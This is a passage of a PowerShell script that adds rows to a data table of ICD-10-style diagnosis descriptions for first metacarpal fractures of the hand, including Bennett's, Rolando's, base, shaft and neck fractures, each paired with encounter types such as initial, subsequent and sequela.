metacarpal bone, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, unspecified hand","Unspecified fracture of first metacarpal bone, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, right hand","Bennett's fracture, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, right hand","Bennett's fracture, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, right hand","Bennett's fracture, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, right hand","Bennett's fracture, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, right hand","Bennett's fracture, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, right hand","Bennett's fracture, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, right hand","Bennett's fracture, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, left hand","Bennett's fracture, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, left hand","Bennett's fracture, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, left hand","Bennett's fracture, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, left hand","Bennett's fracture, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, left hand","Bennett's fracture, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, left hand","Bennett's fracture, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, left hand","Bennett's fracture, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, unspecified hand","Bennett's fracture, unspecified hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, unspecified hand","Bennett's fracture, unspecified hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, unspecified hand","Bennett's fracture, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, unspecified hand","Bennett's fracture, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, unspecified hand","Bennett's fracture, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, unspecified hand","Bennett's fracture, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Bennett's fracture, unspecified hand","Bennett's fracture, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, right hand","Displaced Rolando's fracture, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, right hand","Displaced Rolando's fracture, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, right hand","Displaced Rolando's fracture, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, right hand","Displaced Rolando's fracture, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, right hand","Displaced Rolando's fracture, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, right hand","Displaced Rolando's fracture, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, right hand","Displaced Rolando's fracture, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, left hand","Displaced Rolando's fracture, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, left hand","Displaced Rolando's fracture, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, left hand","Displaced Rolando's fracture, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, left hand","Displaced Rolando's fracture, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, left hand","Displaced Rolando's fracture, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, left hand","Displaced Rolando's fracture, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, left hand","Displaced Rolando's fracture, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, unspecified hand","Displaced Rolando's fracture, unspecified hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, unspecified hand","Displaced Rolando's fracture, unspecified hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, unspecified hand","Displaced Rolando's fracture, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, unspecified hand","Displaced Rolando's fracture, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, unspecified hand","Displaced Rolando's fracture, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, unspecified hand","Displaced Rolando's fracture, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced Rolando's fracture, unspecified hand","Displaced Rolando's fracture, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, right hand","Nondisplaced Rolando's fracture, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, right hand","Nondisplaced Rolando's fracture, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, right hand","Nondisplaced Rolando's fracture, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, right hand","Nondisplaced Rolando's fracture, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, right hand","Nondisplaced Rolando's fracture, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, right hand","Nondisplaced Rolando's fracture, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, right hand","Nondisplaced Rolando's fracture, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, left hand","Nondisplaced Rolando's fracture, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, left hand","Nondisplaced Rolando's fracture, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, left hand","Nondisplaced Rolando's fracture, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, left hand","Nondisplaced Rolando's fracture, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, left hand","Nondisplaced Rolando's fracture, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, left hand","Nondisplaced Rolando's fracture, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, left hand","Nondisplaced Rolando's fracture, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, unspecified hand","Nondisplaced Rolando's fracture, unspecified hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, unspecified hand","Nondisplaced Rolando's fracture, unspecified hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, unspecified hand","Nondisplaced Rolando's fracture, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, unspecified hand","Nondisplaced Rolando's fracture, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, unspecified hand","Nondisplaced Rolando's fracture, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, unspecified hand","Nondisplaced Rolando's fracture, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Rolando's fracture, unspecified hand","Nondisplaced Rolando's fracture, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, right hand","Other displaced fracture of base of first metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, right hand","Other displaced fracture of base of first metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, right hand","Other displaced fracture of base of first metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, right hand","Other displaced fracture of base of first metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, right hand","Other displaced fracture of base of first metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, right hand","Other displaced fracture of base of first metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, right hand","Other displaced fracture of base of first metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, left hand","Other displaced fracture of base of first metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, left hand","Other displaced fracture of base of first metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, left hand","Other displaced fracture of base of first metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, left hand","Other displaced fracture of base of first metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, left hand","Other displaced fracture of base of first metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, left hand","Other displaced fracture of base of first metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, left hand","Other displaced fracture of base of first metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, unspecified hand","Other displaced fracture of base of first metacarpal bone, unspecified hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, unspecified hand","Other displaced fracture of base of first metacarpal bone, unspecified hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, unspecified hand","Other displaced fracture of base of first metacarpal bone, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, unspecified hand","Other displaced fracture of base of first metacarpal bone, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, unspecified hand","Other displaced fracture of base of first metacarpal bone, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, unspecified hand","Other displaced fracture of base of first metacarpal bone, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of base of first metacarpal bone, unspecified hand","Other displaced fracture of base of first metacarpal bone, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, right hand","Other nondisplaced fracture of base of first metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, right hand","Other nondisplaced fracture of base of first metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, right hand","Other nondisplaced fracture of base of first metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, right hand","Other nondisplaced fracture of base of first metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, right hand","Other nondisplaced fracture of base of first metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, right hand","Other nondisplaced fracture of base of first metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, right hand","Other nondisplaced fracture of base of first metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, left hand","Other nondisplaced fracture of base of first metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, left hand","Other nondisplaced fracture of base of first metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, left hand","Other nondisplaced fracture of base of first metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, left hand","Other nondisplaced fracture of base of first metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, left hand","Other nondisplaced fracture of base of first metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, left hand","Other nondisplaced fracture of base of first metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, left hand","Other nondisplaced fracture of base of first metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, unspecified hand","Other nondisplaced fracture of base of first metacarpal bone, unspecified hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, unspecified hand","Other nondisplaced fracture of base of first metacarpal bone, unspecified hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, unspecified hand","Other nondisplaced fracture of base of first metacarpal bone, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, unspecified hand","Other nondisplaced fracture of base of first metacarpal bone, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, unspecified hand","Other nondisplaced fracture of base of first metacarpal bone, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, unspecified hand","Other nondisplaced fracture of base of first metacarpal bone, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of base of first metacarpal bone, unspecified hand","Other nondisplaced fracture of base of first metacarpal bone, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, right hand","Displaced fracture of shaft of first metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, right hand","Displaced fracture of shaft of first metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, right hand","Displaced fracture of shaft of first metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, right hand","Displaced fracture of shaft of first metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, right hand","Displaced fracture of shaft of first metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, right hand","Displaced fracture of shaft of first metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, right hand","Displaced fracture of shaft of first metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, left hand","Displaced fracture of shaft of first metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, left hand","Displaced fracture of shaft of first metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, left hand","Displaced fracture of shaft of first metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, left hand","Displaced fracture of shaft of first metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, left hand","Displaced fracture of shaft of first metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, left hand","Displaced fracture of shaft of first metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, left hand","Displaced fracture of shaft of first metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, unspecified hand","Displaced fracture of shaft of first metacarpal bone, unspecified hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, unspecified hand","Displaced fracture of shaft of first metacarpal bone, unspecified hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, unspecified hand","Displaced fracture of shaft of first metacarpal bone, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, unspecified hand","Displaced fracture of shaft of first metacarpal bone, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, unspecified hand","Displaced fracture of shaft of first metacarpal bone, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, unspecified hand","Displaced fracture of shaft of first metacarpal bone, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of first metacarpal bone, unspecified hand","Displaced fracture of shaft of first metacarpal bone, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, right hand","Nondisplaced fracture of shaft of first metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, right hand","Nondisplaced fracture of shaft of first metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, right hand","Nondisplaced fracture of shaft of first metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, right hand","Nondisplaced fracture of shaft of first metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, right hand","Nondisplaced fracture of shaft of first metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, right hand","Nondisplaced fracture of shaft of first metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, right hand","Nondisplaced fracture of shaft of first metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, left hand","Nondisplaced fracture of shaft of first metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, left hand","Nondisplaced fracture of shaft of first metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, left hand","Nondisplaced fracture of shaft of first metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, left hand","Nondisplaced fracture of shaft of first metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, left hand","Nondisplaced fracture of shaft of first metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, left hand","Nondisplaced fracture of shaft of first metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, left hand","Nondisplaced fracture of shaft of first metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, unspecified hand","Nondisplaced fracture of shaft of first metacarpal bone, unspecified hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, unspecified hand","Nondisplaced fracture of shaft of first metacarpal bone, unspecified hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, unspecified hand","Nondisplaced fracture of shaft of first metacarpal bone, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, unspecified hand","Nondisplaced fracture of shaft of first metacarpal bone, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, unspecified hand","Nondisplaced fracture of shaft of first metacarpal bone, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, unspecified hand","Nondisplaced fracture of shaft of first metacarpal bone, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of first metacarpal bone, unspecified hand","Nondisplaced fracture of shaft of first metacarpal bone, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, right hand","Displaced fracture of neck of first metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, right hand","Displaced fracture of neck of first metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, right hand","Displaced fracture of neck of first metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, right hand","Displaced fracture of neck of first metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, right hand","Displaced fracture of neck of first metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, right hand","Displaced fracture of neck of first metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, right hand","Displaced fracture of neck of first metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, left hand","Displaced fracture of neck of first metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, left hand","Displaced fracture of neck of first metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, left hand","Displaced fracture of neck of first metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, left hand","Displaced fracture of neck of first metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, left hand","Displaced fracture of neck of first metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, left hand","Displaced fracture of neck of first metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, left hand","Displaced fracture of neck of first metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, unspecified hand","Displaced fracture of neck of first metacarpal bone, unspecified hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, unspecified hand","Displaced fracture of neck of first metacarpal bone, unspecified hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, unspecified hand","Displaced fracture of neck of first metacarpal bone, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, unspecified hand","Displaced fracture of neck of first metacarpal bone, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, unspecified hand","Displaced fracture of neck of first metacarpal bone, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, unspecified hand","Displaced fracture of neck of first metacarpal bone, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of first metacarpal bone, unspecified hand","Displaced fracture of neck of first metacarpal bone, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, right hand","Nondisplaced fracture of neck of first metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, right hand","Nondisplaced fracture of neck of first metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, right hand","Nondisplaced fracture of neck of first metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, right hand","Nondisplaced fracture of neck of first metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, right hand","Nondisplaced fracture of neck of first metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, right hand","Nondisplaced fracture of neck of first metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, right hand","Nondisplaced fracture of neck of first metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, left hand","Nondisplaced fracture of neck of first metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, left hand","Nondisplaced fracture of neck of first metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, left hand","Nondisplaced fracture of neck of first metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, left hand","Nondisplaced fracture of neck of first metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, left hand","Nondisplaced fracture of neck of first metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, left hand","Nondisplaced fracture of neck of first metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, left hand","Nondisplaced fracture of neck of first metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, unspecified hand","Nondisplaced fracture of neck of first metacarpal bone, unspecified hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, unspecified hand","Nondisplaced fracture of neck of first metacarpal bone, unspecified hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck 